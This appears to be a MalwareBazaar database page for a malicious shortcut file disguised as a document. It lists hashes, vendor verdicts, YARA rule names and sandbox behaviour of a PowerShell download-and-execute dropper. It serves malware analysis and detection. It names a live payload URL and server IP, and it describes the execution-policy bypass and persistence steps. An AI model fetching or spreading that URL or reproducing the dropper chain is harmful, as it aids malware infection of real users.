MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 9


Intelligence 9 IOCs YARA 7 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0
SHA3-384 hash: ff99c9955ddeae23de0ebcf36c220d53db12fa1b8d6ab0680ee358bd5797dcdfbe817f0d445eefdfbcba682c4ad02865
SHA1 hash: 96aadee715463c50cf22c0a93b5fe1532a058d5c
MD5 hash: 98b1b442429c084ac8301af4638ea18d
humanhash: red-triple-sixteen-eighteen
File name:Document.doc.lnk
Download: download sample
File size:1'991 bytes
First seen:2024-03-28 09:31:15 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/octet-stream
ssdeep 24:8xfJcECTZWiAU6SyLRerUMkWI9wCc5zTS9Zm:8xi4BMyLRerHyEO9Z
TLSH T16B41D0221BC70364E2F58A399C7AE7419D657C1AEA078E5D0185D78C1C60614EC75F3D
Reporter cocaman
Tags:lnk

Intelligence

File Origin
# of uploads :
1
# of downloads :
181
Origin country :
CH CH
Vendor Threat Intelligence
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0/results/dashboard
Payload URLs
URL
File name
http://twizt.net/spl.exe','
LNK File
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
cmd dropper lolbin masquerade powershell shell32
Link:
https://www.filescan.io/uploads/6605391bf1c80c2d4d5b301f/reports/cd7c43a9-322c-47ae-8b36-a959fb1e2810/overview
Verdict:
Malicious
Labled as:
Trojan.PowerShell.LNK.Generic.6;BZC.YAX.Boxter.251
Link:
https://www.hybrid-analysis.com/sample/7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0
Result
Verdict:
MALICIOUS
Result
Threat name:
MalLnk
Create hunting rule
Detection:
malicious
Classification:
rans.troj.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1416951
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Found evasive API chain (may stop execution after checking mutex)
Found URL in windows shortcut file (LNK)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Snort IDS alert for network traffic
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416951 Sample: Document.doc.lnk Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 36 twizt.net 2->36 42 Snort IDS alert for network traffic 2->42 44 Multi AV Scanner detection for domain / URL 2->44 46 Antivirus detection for URL or domain 2->46 48 10 other signatures 2->48 9 cmd.exe 1 2->9         started        12 winsvc.exe 2->12         started        14 winsvc.exe 2->14         started        signatures3 process4 signatures5 58 Windows shortcut file (LNK) starts blacklisted processes 9->58 60 Suspicious powershell command line found 9->60 62 Tries to download and execute files (via powershell) 9->62 64 Bypasses PowerShell execution policy 9->64 16 powershell.exe 14 29 9->16         started        21 conhost.exe 1 9->21         started        process6 dnsIp7 34 twizt.net 185.215.113.66, 49706, 49707, 49708 WHOLESALECONNECTIONSNL Portugal 16->34 30 C:\Users\user\windrv.exe, PE32 16->30 dropped 38 Drops PE files to the user root directory 16->38 40 Powershell drops PE file 16->40 23 windrv.exe 1 14 16->23         started        file8 signatures9 process10 file11 32 C:\Users\user\winsvc.exe, PE32 23->32 dropped 50 Multi AV Scanner detection for dropped file 23->50 52 Found evasive API chain (may stop execution after checking mutex) 23->52 54 Machine Learning detection for dropped file 23->54 56 2 other signatures 23->56 27 winsvc.exe 12 23->27         started        signatures12 process13 signatures14 66 Multi AV Scanner detection for dropped file 27->66 68 Found evasive API chain (may stop execution after checking mutex) 27->68 70 Machine Learning detection for dropped file 27->70 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->72
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0/
Threat name:
Shortcut.Trojan.PhorpiexLNK
Create hunting rule
Status:
Malicious
First seen:
2024-03-28 07:38:25 UTC
File Type:
Binary
AV detection:
14 of 23 (60.87%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=pn2bxjpvx7s2mbc7d4m6ap2beitmp3nufrwjjjnjferfcxnitkqa._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
persistence
Link:
https://tria.ge/reports/240328-lhlttshe2s/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Adds Run key to start application
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Malware Config
Dropper Extraction:
http://twizt.net/spl.exe
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/7b741ba5f5bf/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Download_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies download artefacts in shortcut (LNK) files.
Rule name:Execution_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies execution artefacts in shortcut (LNK) files.
Rule name:EXE_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies executable artefacts in shortcut (LNK) files.
Rule name:PS_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name:SUSP_LNK_CMD
Create hunting rule
Author:SECUINFRA Falcon Team
Description:Detects the reference to cmd.exe inside an lnk file, which is suspicious
Rule name:SUSP_LNK_PowerShell
Create hunting rule
Author:SECUINFRA Falcon Team
Description:Detects the reference to powershell inside an lnk file, which is suspicious
Rule name:SUSP_LNK_SuspiciousCommands
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Detects LNK file with suspicious content

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

zip 02b4211c449f6ee34f6211d5eae7fb0ec573ab304a209354111e7d2ee3a23464

Shortcut (lnk) lnk 7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0

(this sample)

  
Delivery method
Other
  
Dropped by
SHA256 02b4211c449f6ee34f6211d5eae7fb0ec573ab304a209354111e7d2ee3a23464
  
Dropped by
MD5 5d288eb2fe75da7ab3902170c5192151

Comments